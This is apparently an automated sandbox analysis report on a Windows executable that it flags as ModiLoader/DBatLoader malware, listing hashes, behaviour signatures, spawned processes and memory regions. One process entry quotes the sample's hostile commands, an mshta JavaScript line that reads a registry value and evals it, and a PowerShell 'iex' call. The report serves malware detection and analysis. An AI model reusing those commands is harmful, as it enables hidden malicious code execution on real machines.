Analysis
-
max time kernel
142s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
18-06-2024 08:09
General
-
Target
baa772483d520692faf5ac0bf05f7cfb_JaffaCakes118.exe
-
Size
435KB
-
MD5
baa772483d520692faf5ac0bf05f7cfb
-
SHA1
a6e3a4018f50f2906716880166f2056e4dd2afca
-
SHA256
b66e16083175b7ee33458a5f6aa57453cec8d21b9d9a5b5854e3cabfcb2aa413
-
SHA512
1ebd0b2cb742e72c0fedb50ac3fcaf7c425119f04846740032fbf4fd5b86a50fcd4ea2b81f1084d2e76ad735af474d300c4d872fb7339dfc02de22d9c9a69e7b
-
SSDEEP
6144:jxz9Oivnkb6Lf3Oguf3Jn3kyt+43CQlKJeHrh+n0K/HpIGKQ3YnmfvG3:jxVvnIk/Ogq9rHV9+n06CGF8mfvq
Score
10/10
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
ModiLoader Second Stage 8 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 17 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\baa772483d520692faf5ac0bf05f7cfb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\baa772483d520692faf5ac0bf05f7cfb_JaffaCakes118.exe"1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 11362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 9762⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 2442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 11442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 9042⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 2362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 11922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 5442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12202⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 12402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 13042⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 13362⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 13562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 13722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 13442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4972 -ip 49721⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:IRBzE37x="46hwAe";wp54=new%20ActiveXObject("WScript.Shell");wdtu5ytP="L75GlRmn";qCus5=wp54.RegRead("HKLM\\software\\Wow6432Node\\xYMw1l\\oH8QI4");Hz0s1FfY="oAWLWhLCj";eval(qCus5);vG20KQjL="461RiOoQwl";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hted2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3840,i,6522675234395427298,2952738987384583032,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:81⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4972 -ip 49721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4972 -ip 49721⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sk01msvh.peb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2368-12-0x0000000004870000-0x00000000048A6000-memory.dmpFilesize
216KB
-
memory/2368-32-0x0000000006130000-0x000000000614A000-memory.dmpFilesize
104KB
-
memory/2368-14-0x0000000004EA0000-0x0000000004EC2000-memory.dmpFilesize
136KB
-
memory/2368-13-0x0000000005030000-0x0000000005658000-memory.dmpFilesize
6.2MB
-
memory/2368-31-0x0000000007490000-0x0000000007B0A000-memory.dmpFilesize
6.5MB
-
memory/2368-28-0x0000000005C80000-0x0000000005CCC000-memory.dmpFilesize
304KB
-
memory/2368-27-0x0000000005C40000-0x0000000005C5E000-memory.dmpFilesize
120KB
-
memory/2368-26-0x00000000057B0000-0x0000000005B04000-memory.dmpFilesize
3.3MB
-
memory/2368-15-0x00000000056D0000-0x0000000005736000-memory.dmpFilesize
408KB
-
memory/2368-16-0x0000000005740000-0x00000000057A6000-memory.dmpFilesize
408KB
-
memory/4972-10-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB
-
memory/4972-3-0x0000000000400000-0x0000000000473000-memory.dmpFilesize
460KB
-
memory/4972-8-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB
-
memory/4972-0-0x00000000031D0000-0x0000000003210000-memory.dmpFilesize
256KB
-
memory/4972-1-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/4972-7-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB
-
memory/4972-2-0x00000000031D0000-0x0000000003210000-memory.dmpFilesize
256KB
-
memory/4972-9-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB
-
memory/4972-29-0x0000000000400000-0x0000000000473000-memory.dmpFilesize
460KB
-
memory/4972-30-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/4972-6-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB
-
memory/4972-5-0x00000000006E0000-0x00000000007A0000-memory.dmpFilesize
768KB